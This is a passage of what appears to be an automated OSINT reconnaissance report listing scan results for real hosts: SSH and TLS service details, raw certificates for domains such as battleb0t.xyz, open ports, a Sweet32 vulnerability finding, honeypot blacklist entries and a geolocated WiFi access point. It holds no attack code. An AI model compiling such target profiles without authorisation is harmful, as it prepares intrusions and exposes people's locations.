"zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:80 | 172.67.135.9 |
| 2023-05-12 02:44:22 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:02:6d:eb:8d:63:78:04:f2:b8:5c:db:39:06:ab:26:ed:a9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 15 23:40:10 2023 GMT
Not After : Jun 13 23:40:09 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:75:15:09:c5:81:bb:98:d9:cd:95:bf:a9:c2:90:
49:7e:c9:d9:5b:ca:38:d9:40:de:af:17:a2:51:84:
18:c1:ec:ed:c3:d5:19:f0:4f:41:01:a3:0d:ed:ef:
4f:5a:04:c7:16:79:5d:fa:96:dc:2a:ec:4f:7c:34:
46:4c:ee:fd:f2
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:6F:61:1C:BE:F6:0B:43:74:69:9A:F6:F2:62:F9:6E:CA:07:05:76
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz, DNS:pics.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 16 00:40:11.019 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:3B:02:0B:A2:9E:E2:86:CB:95:75:BB:27:
6B:53:31:16:B5:86:49:63:A8:15:4C:A6:35:A9:06:89:
64:81:81:8A:02:21:00:DB:BF:EF:1B:02:D3:29:C8:31:
95:BB:C8:B6:24:D4:2D:39:FE:3C:BB:87:87:DD:4C:3D:
6E:F8:5C:00:34:71:DB
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 16 00:40:11.009 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:04:85:7D:9E:71:55:A6:C5:38:5A:64:60:
05:9A:15:17:EA:9E:B4:58:0D:3C:86:17:2C:C3:17:21:
8A:21:DE:13:02:21:00:93:46:3A:71:BC:50:F5:73:1A:
31:49:1D:77:D8:F0:F3:D0:7E:06:7D:4A:BA:7A:E8:B4:
4B:2C:3E:84:83:8A:4F
Signature Algorithm: sha256WithRSAEncryption
78:10:ed:28:eb:d8:01:0b:d1:ab:19:2d:17:b5:cd:db:df:f0:
19:bb:c5:bf:e8:be:94:e0:d7:f7:4a:e4:78:eb:00:83:c4:77:
d7:fc:46:d2:7a:d8:2d:ae:b3:9c:1f:b1:2a:97:00:27:56:0d:
be:3b:56:d6:ea:2e:ac:0f:22:29:52:8c:2f:4e:a7:73:9a:8b:
01:f5:2d:ee:f8:6e:63:a3:e0:20:d2:6f:0f:23:ec:f3:e9:f5:
3a:da:07:33:d8:60:c2:43:1f:8b:32:3f:73:0c:e2:d3:be:13:
67:7a:78:16:d5:05:c8:0e:fc:fe:a1:13:73:df:ce:e4:30:4f:
fc:8a:88:a9:4b:94:16:66:3b:1f:a0:96:6e:fd:1e:fa:4a:d4:
c5:37:c1:78:37:3a:c2:f7:2a:52:e1:64:81:83:df:6c:ec:18:
9f:e8:7f:40:ba:dd:8d:ff:ab:1d:65:a2:95:0c:4b:2a:b3:d4:
36:dd:e6:94:5d:2a:ad:ec:e1:d1:0d:fe:4d:1f:eb:87:d5:03:
b5:2f:bd:c9:98:e1:60:20:bf:6e:0c:7a:85:90:e0:96:42:6a:
86:09:c1:bb:ce:bb:d7:7b:a4:b3:1a:c0:15:1c:0d:88:6b:61:
74:d0:93:ed:30:c2:a8:1b:7a:94:f2:58:8e:6d:bd:c5:15:f9:
a0:e1:79:05
| battleb0t.xyz |
| 2023-05-12 03:09:46 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 65.170.74.34.bc.googleusercontent.com | 34.74.170.65 |
| 2023-05-12 03:41:52 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["315"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Server": ["Microsoft-HTTPAPI/2.0"], "Connection": ["close"], "Content_Type": ["text/html; charset=us-ascii"], "Date": ["<REDACTED>"]} | 45.131.109.53 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:40 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Font Awesome | funny.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | linksys (Net ID: 00:0C:41:A0:89:8A) | 32.8608, -79.9746 |
| 2023-05-12 03:09:52 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.94 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:25 | 87.248.157.102 |
| 2023-05-12 02:54:41 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H04595A0C45NR8DMSR5TCKG9
Date: <REDACTED>
Content-Length: 0
| 104.196.30.220 |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.223): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:12:12 | Vulnerability - CVE High | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2016-2183
https://nvd.nist.gov/vuln/detail/CVE-2016-2183
Score: 7.5
Description: The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. | 188.114.96.1 |
| 2023-05-12 02:54:23 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H04DT6EFGA302FBVMKFT2XD1
Date: <REDACTED>
Content-Length: 0
| 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.130): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:05:09 | Affiliate - Internet Name | No | Cross-Reference | 1 | 1 | 3 | 0 | None | github.com | https://github.com/BattleB0t |
| 2023-05-12 02:50:05 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://rustmagazine.org/static/favicon/site.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /static/favicon/site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rustmagazine.org\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /static/favicon/site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rustmagazine.org\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar5FE6.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar6016.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d58_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_d58_ConnHashTable<3416>_HashTable_Mutex"\n "SmartScreen_ClientId_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_d58_IESQMMUTEX_0_303"\n "IsoScope_d58_IESQMMUTEX_0_519"\n "Local\\ZonesLockedCacheCounterMutex"\n "SmartScreen_AppRepSettings_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3416"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_d58_IE_EarlyTabStart_0xc48_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_d58_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "CommunicationManager_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\SmartScreen_AppRepSettings_Mutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab5FD5.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab6015.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1036', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-177', u'attck_id': u'T1036', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "4DECWBA5.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4DECWBA5.txt]- [targetUID: 00000000-00003416]\n Dropped file: "EM5QEVBV.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EM5QEVBV.txt]- [targetUID: 00000000-00003416]\n Dropped file: "1V15O9V6.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1V15O9V6.txt]- [targetUID: 00000000-00003416]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "Tar5FE6.tmp" has type "data"- Location: [%TEMP%\\Tar5FE6.tmp]- [targetUID: 00000000-00003948]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003948]\n "4DECWBA5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\4DECWBA5.txt]- [targetUID: 00000000-00003416]\n "RecoveryStore._7734DE51-A810-11ED-8751-0800271C5049_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Cab5FD5.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab5FD5.tmp]- [targetUID: 00000000-00003948]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DFAF54E82161A92B7A.TMP" has type "data"- Location: [%TEMP%\\~DFAF54E82161A92B7A.TMP]- [targetUID: 00000000-00003416]\n "Tar6016.tmp" has type "data"- Location: [%TEMP%\\Tar6016.tmp]- [targetUID: 00000000-00003948]\n "_7734DE53-A810-11ED-8751-0800271C5049_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "JavaDeployReg.log" has type "ASCII text with CRLF line terminators"- Location: [%TEMP%\\JavaDeployReg.log]- [targetUID: 00000000-00003948]\n "EM5QEVBV.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EM5QEVBV.txt]- [targetUID: 00000000-00003416]\n "Cab6015.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab6015.tmp]- [targetUID: 00000000-00003948]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003416]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003948]\n "~DF6898893CF9D6102D.TMP" has type "data"- Location: [%TEMP%\\~DF6898893CF9D6102D.TMP]- [targetUID: 00000000-00003416]\n "site.webmanifest.lxbzcvx.partial" has type "JSON data"- Location: [%USERPROFILE%\\Downloads\\site.webmanifest.lxbzcvx.partial]- [targetUID: 00000000-00003416]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-159', u'name': u'Writes log files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1074/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1074.001', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes a file "%TEMP%\\JavaDeployReg.log"\n "iexplore.exe" writes a file "%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\Recovery\\High\\Active\\RecoveryStore.{7734DE51-A810-11ED-8751-0800271C5049}.dat"\n "iexplore.exe" writes a file "%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\Recovery\\High\\Active\\{7734DE53-A810-11ED-8751-0800271C5049}.dat"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /static/favicon/site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rustmagazine.org\nDNT: 1\nConnection: Keep-Alive"\n "u\n0E%n\n|p"2jb@9p=@ISw7|@Q#dT-u$u{&1\\r6$4\'FlJhUnbTmtPA|^`\ne~BX!"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://rustmagazine.org/static/favicon/site.webmanifest"\n Pattern match: "https://rustmagazine.org"'}, {u'category': u'Cryptographic Related', u'origin': u'File/Memory', u'identifier': u'string-57', u'name': u'Found a cryptographic related string', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1027', u'threat_level_human': u'informative', u'capec_id' | 185.199.110.153 |
| 2023-05-12 02:59:45 | SSL Certificate - Raw Data | No | Certificate Transparency | 2 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:7b:a3:67:f4:76:b8:d0:86:bd:aa:81:68:7c:78:c6:53:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 18:07:07 2022 GMT
Not After : Mar 13 18:07:06 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:f3:5c:50:fa:14:e0:3f:8b:c6:63:22:13:37:d5:
cb:b8:bd:8b:1e:a5:6b:3e:a7:72:86:59:28:5c:40:
8b:1c:f8:2f:50:4b:f5:ef:0d:c5:e9:de:f9:20:da:
78:1c:0d:66:f9:dc:3f:93:0b:74:ad:7f:b2:a1:7a:
56:57:3c:77:28:5a:1a:58:66:08:52:f6:b9:f7:00:
cb:6d:f6:d8:ce:be:b0:7d:24:54:62:4e:58:7b:85:
b9:a9:b7:ac:6a:8d:99:a5:06:fd:0d:b0:88:77:c4:
